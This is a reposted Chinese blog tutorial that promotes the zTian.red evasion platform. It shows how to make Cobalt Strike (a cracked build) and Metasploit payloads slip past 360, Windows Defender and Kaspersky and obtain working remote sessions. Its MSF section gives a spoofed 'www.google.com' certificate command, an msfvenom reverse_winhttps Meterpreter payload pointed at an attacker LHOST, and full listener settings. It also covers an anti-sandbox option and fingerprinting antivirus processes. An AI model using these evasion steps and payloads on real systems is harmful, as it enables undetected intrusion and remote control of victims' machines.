遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

这篇具有很好参考价值的文章主要介绍了遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

zTian.red:绕过卡巴斯基、360安全卫士、Windows Defender动态执行CS、MSF命令...

测试目标:Windows Defender、卡巴斯基、360安全卫士极速版

系统环境:win10 64位   

软件版本:cs4.7破解版、msf社区免费版 

流量通信:http与https

测试平台:遮天对抗平台,地址:zTian.red

测试时间:2022-11-16

一、Cobalt Strike ShellCode免杀测试:

开始:

使用默认无修改teamserver配置,直接运行服务。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

添加两个监听,然后生成payload文件。导出payload时文件类型可以选择C、Java、Python。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

打开遮天对抗平台,选中要进行测试的payload文件。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

选中payload,填入获取到的私钥,然后提交任务。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

先各生成一个免杀文件:

DZoOQslVhc.exe(http)、hYyeYdAoHS.exe(https)

测试绕过360安全防护:

另一台s安装360安全卫士极速版的测试终端在下载好生成的文件之后直接被告警。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

下载使用http流量的程序,没想到却无任何反应。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

云查杀无异常且可以动态执行命令。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

测试绕过Windows Defender:

在Defernder下,http和https静态都未被警告。测试运行http类型,被提示病毒。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

运行https,未被拦截,且可以执行命令。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

测试绕过卡巴斯基:

不愧是卡巴斯基,直接就给我删掉了。依稀记得前几个月还没有给我拦截呢。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

重新提交任务,勾选智能反沙箱。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

再次扫描成功绕过。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

只是反沙箱模块需要诸多条件,如:禁止修改文件名、系统开机时间大于十小时。由于测试机子时间不满足,重新在主机器安装卡巴斯基,测试动态能力。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

经过十几秒的等待,成功上线。执行命令,完美响应

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

总结

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

360安全卫士静态识别出了https类型程序,没有检测到http类型程序。

Windows Defender静态均未检测到,动态检测到了http类型程序,并且做了拦截。对https类型没有检测到,且动态可以正常执行命令。

卡巴斯基均查杀,开启反沙箱之后成功绕过。注意反沙箱模块禁止修改文件名称,并且系统开机时间需要大于十小时。

二、MSF免杀测试:

 由于我对MSF用法不是那么熟悉,以下仅测试一种方案:

使用windows/shell/reverse_tcp生成的shellcode连接时候流量被检测到,直接拦截,

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

使用ssl加密流量测试绕过。先生成证书,执行命令:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \-keyout www.google.com.key \-out www.google.com.crt && \cat www.google.com.key www.google.com.crt>www.google.com.pem && \rm -f www.google.com.key www.google.com.crt

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

之后在绝对路径可以看到证书文件

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

再执行命令生成payload:

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=172.21.194.45  LPORT=8789 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f c

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

生成完毕之后进入msf控制台执行监听命令:

use exploit/multi/handler set payload windows/meterpreter/reverse_winhttpsset lhost 0.0.0.0set lport 4444set HandlerSSLCert /home/kali/google.pemset StagerVerifySSLCert true set IgnoreUnknowPayloads trueset exitonsession falseexploit

复制shellcode的主要内容部分,新建一个文件将之写入,然后传入遮天对抗平台进行生成。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

生成后直接执行,获取到session

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

使用进入meterpreter之后完美执行命令且无拦截。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

扩展:识别Anti Virus进程方式:

执行命令“TASKLIST /SVC”  然后将得到的结果粘贴至下方识别栏里进行识别。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

识别出卡巴斯基。

遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

项目地址:github.com/yqcs/zhetian​文章来源地址https://www.toymoban.com/news/detail-405128.html

到了这里,关于遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 卡巴斯基 | 全球地区范围网络安全威胁实时数据显示地图

    卡巴斯基 卡巴斯基反病毒软件是世界上拥有最尖端科技的杀毒软件之一,总部设在俄罗斯首都莫斯科,全名“卡巴斯基实验室”,是国际著名的信息安全领导厂商之一,创始人为俄罗斯人尤金·卡巴斯基。         公司为个人用户、企业网络提供反病毒、防黑客和反垃圾

    2024年02月11日
    浏览(45)
  • 第124天:内网安全-代理技术&Socks协议&路由不出网&后渗透通讯&CS-MSF上线

    个人理解 1、相当于本来流程是:解决网络通信问题 — 拿到权限 — 进行后门控制,但这里小迪只讲了如何解决网络通信问题和如何进行后门控制,拿到权限属于横向移动的内容后面才讲。 2、在本次实验环境中,Win 7主机有外网出口而其余主机没有,所以我们将Win 7当作跳板

    2024年02月13日
    浏览(40)
  • 从苏宁电器到卡巴斯基(第二部)第30篇:我当高校教师的这几年 VI

    我在高校任教已经有几年的时间了,给我的感觉,教师的工作真的正应了“铁打的营盘流水的兵”这句话,以年为单位,每年其实都在重复着相同的工作,甚至可以精确到月、日,都已经是给我们安排好了的。比如几月开学,几月期中考试,几月期末考试,几月排课,几月交

    2023年04月18日
    浏览(54)
  • 从苏宁电器到卡巴斯基(第二部)第31篇:我当高校教师的这几年 VII

    目录 必须要开始做前端开发了 我感觉,三本学生并不比985硕士研究生差 我一开始与X高校签约,签的是《任务工作岗位劳动合同》,合同期限是一年,具体内容是“学院网络安全维护及信息化开发”工作。但由于学校人手不足,因此我也是需要承担授课以及带毕业设

    2024年02月02日
    浏览(58)
  • APT之木马动态免杀绕过Windows Defender

    c++编译环境 一串简单的将shellcode加载入windows内存执行的c++代码 payload变量里存储的就是我们的shellcode 代码: 作用: 代码: 作用: 代码: 解释: 代码: 作用: 代码: 作用: 代码: 作用: 代码: 作用: 这就是一个简单的将shellcode加载进windows内存里执行的程序代码 如果

    2024年02月12日
    浏览(42)
  • 权限提升WIN篇(腾讯云,CS,MSF)

    操作系统版本 ver,systeminfo 漏洞补丁信息 systeminfo 操作系统位数 systeminfo 杀软防护 tasklist /svc 网络 netstat -ano,ipconfig 当前权限 whoami 根据前面的信息收集中的系统版本,位数和补丁情况筛选出合适的EXP 根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作 如

    2024年02月07日
    浏览(40)
  • 72 内网安全-域横向CS&MSF联动及应急响应初识

    权限维持留到后面在补充,先把后面的知识点给大家讲起来,因为权限维持它是我们前期如果拿到权限之后,能做的事情,前期没有拿到权限的话,这个东西是个多余的技术,所以我们还是比较偏向于攻击方面,像权限维持是为了自身知识的全面性才讲的 CS和msf的联动,这个

    2024年02月03日
    浏览(41)
  • CS免杀上线方式

    🍊博客主页:Scorpio_m7 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 🌟本文由 Scorpio_m7原创,CSDN首发! 📆首发时间:🌹2022年1月28日🌹 ✉️坚持和努力一定能换来诗与远方! 🙏作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢! wmic是一款Microsoft工具,它提供

    2024年02月07日
    浏览(35)
  • 一条命令上线MSF(Metasploit)-web_delivery模块

    最近比较多人问我,如果在实战里getshell了,比如各种OA的rce,但是会碰到权限很低,不是root或者是system权限的情况,而且在拿到shell之后不知道怎么提权,不知道下一步该干嘛,后渗透不是很熟练等等等等。所以我就趁今晚月色那么漂亮,顺便记一下web_delivery模块。 如果被

    2024年02月10日
    浏览(63)
  • 利用蚁剑钓鱼上线CS

    中国蚁剑使用Electron构建客户端软件,Electron实现上用的是Node.js,并且Node.js能执行系统命令,故可以利用蚁剑的webshell页面嵌入js来直接执行命令,进而钓鱼来上线CS。(类似Goby,Goby也是使用Electron构建客户端软件) 蚁剑在虚拟终端时,页面上出现http/https协议头时会发生转换

    2024年02月03日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包